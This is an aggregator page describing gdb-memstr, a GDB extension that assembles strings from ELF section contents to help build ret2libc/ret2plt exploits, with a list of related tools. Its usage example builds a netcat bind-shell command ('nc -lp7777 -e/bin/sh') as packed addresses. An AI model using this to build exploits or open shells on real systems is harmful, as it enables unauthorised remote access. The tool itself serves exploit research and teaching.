GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → pageflt → gdb-memstr

pageflt / gdb-memstr

Licence: MIT license
Generate arbitrary strings out of contents of ELF sections

Programming Languages

python
139335 projects - #7 most used programming language

Labels

gdbelfexploit-developmentgdb-extensionret2libc

Projects that are alternatives of or similar to gdb-memstr

Gef
GEF (GDB Enhanced Features) - a modern experience for GDB with advanced debugging features for exploit developers & reverse engineers ☢
Stars: ✭ 4,197 (+32184.62%)
Mutual labels:  gdb, exploit-development
exploiting
Exploiting challenges in Linux and Windows
Stars: ✭ 122 (+838.46%)
Mutual labels:  gdb, exploit-development
CVIP
C/C++/Golang/Linux...知识整理
Stars: ✭ 62 (+376.92%)
Mutual labels:  gdb, elf
Gdb Frontend
☕ GDBFrontend is an easy, flexible and extensionable gui debugger.
Stars: ✭ 2,104 (+16084.62%)
Mutual labels:  gdb, gdb-extension
gdbdump-ruby
Dump C level and Ruby level backtrace from living ruby process or core file using gdb
Stars: ✭ 15 (+15.38%)
Mutual labels:  gdb
Symgdb
SymGDB - symbolic execution plugin for gdb
Stars: ✭ 202 (+1453.85%)
Mutual labels:  gdb
Build An Efficient Pwn Environment
How to build an efficient pwn development environment in 2020
Stars: ✭ 191 (+1369.23%)
Mutual labels:  gdb
Docker Clion Dev
Debugging C++ in a Docker Container with CLion IDE
Stars: ✭ 172 (+1223.08%)
Mutual labels:  gdb
elfinfo
Utility for displaying which compiler was used for creating an ELF file + basic info
Stars: ✭ 22 (+69.23%)
Mutual labels:  elf
asm2cfg
Python command-line tool and GDB extension to view and save x86, ARM and objdump assembly files as control-flow graph (CFG) pdf files
Stars: ✭ 42 (+223.08%)
Mutual labels:  gdb
research
VerSprite Security Research
Stars: ✭ 148 (+1038.46%)
Mutual labels:  exploit-development
Linux Kernel Module Cheat
The perfect emulation setup to study and develop the Linux kernel v5.4.3, kernel modules, QEMU, gem5 and x86_64, ARMv7 and ARMv8 userland and baremetal assembly, ANSI C, C++ and POSIX. GDB step debug and KGDB just work. Powered by Buildroot and crosstool-NG. Highly automated. Thoroughly documented. Automated tests. "Tested" in an Ubuntu 19.10 ho…
Stars: ✭ 2,748 (+21038.46%)
Mutual labels:  gdb
gdbundle
Minimalist plugin manager for GDB and LLDB
Stars: ✭ 72 (+453.85%)
Mutual labels:  gdb
Pyvmidbg
LibVMI-based debug server, implemented in Python. Building a guest aware, stealth and agentless full-system debugger
Stars: ✭ 192 (+1376.92%)
Mutual labels:  gdb
checksec.rs
Fast multi-platform (ELF/PE/MachO) binary checksec written in Rust.
Stars: ✭ 71 (+446.15%)
Mutual labels:  elf
Heapinspect
🔍Heap analysis tool for CTF pwn.
Stars: ✭ 177 (+1261.54%)
Mutual labels:  gdb
Gdbghidra
gdbghidra - a visual bridge between a GDB session and GHIDRA
Stars: ✭ 251 (+1830.77%)
Mutual labels:  gdb
esp-gdbstub
ESP8266 debugging tool
Stars: ✭ 13 (+0%)
Mutual labels:  gdb
Code Debug
Native debugging for VSCode
Stars: ✭ 232 (+1684.62%)
Mutual labels:  gdb
Pyrasite
Inject code into running Python processes
Stars: ✭ 2,586 (+19792.31%)
Mutual labels:  gdb
View All Similar Projects ➔

gdb-memstr

Description

This is a proof-of-concept GDB extension for assembling arbitrary ASCII strings out of the contents of the address space of an ELF binary.

It can be handy during the development of ret2libc/ret2plt attacks when the user-supplied data is not located at a fixed or predictable location, in which case the arguments for the libc function should be constructed on-the-fly by chaining calls to functions like memcpy/strcpy/strncpy/sprintf/snprintf/etc.

Installation

Use the source, Luke:

(gdb) source /path/to/memstr.py

Usage

$ gdb ./vuln
(gdb) break main
Breakpoint 1 at 0x400587
(gdb) run
Starting program: /home/max/Code/testbed/vuln 
(gdb) memstr "/bin/nc.traditional -lp7777 -e/bin/sh" text
STR = [
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x4011ce),    # b
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x400635),    # c
    struct.pack('<Q', 0x40067a),    # .
    struct.pack('<Q', 0x4003da),    # t
    struct.pack('<Q', 0x40094b),    # r
    struct.pack('<Q', 0x4011eb),    # a
    struct.pack('<Q', 0x4006f9),    # d
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x4003da),    # t
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x401077),    # o
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x4011eb),    # a
    struct.pack('<Q', 0x4008e7),    # l
    struct.pack('<Q', 0x400787),    #  
    struct.pack('<Q', 0x4003f7),    # -
    struct.pack('<Q', 0x4008e7),    # l
    struct.pack('<Q', 0x400597),    # p
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x400787),    #  
    struct.pack('<Q', 0x4003f7),    # -
    struct.pack('<Q', 0x400f37),    # e
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x4011ce),    # b
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x400519),    # s
    struct.pack('<Q', 0x4007a2),    # h
    struct.pack('<Q', 0x4003b5)     # \0
]

Thanks

Thanks to argp for his input on this.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].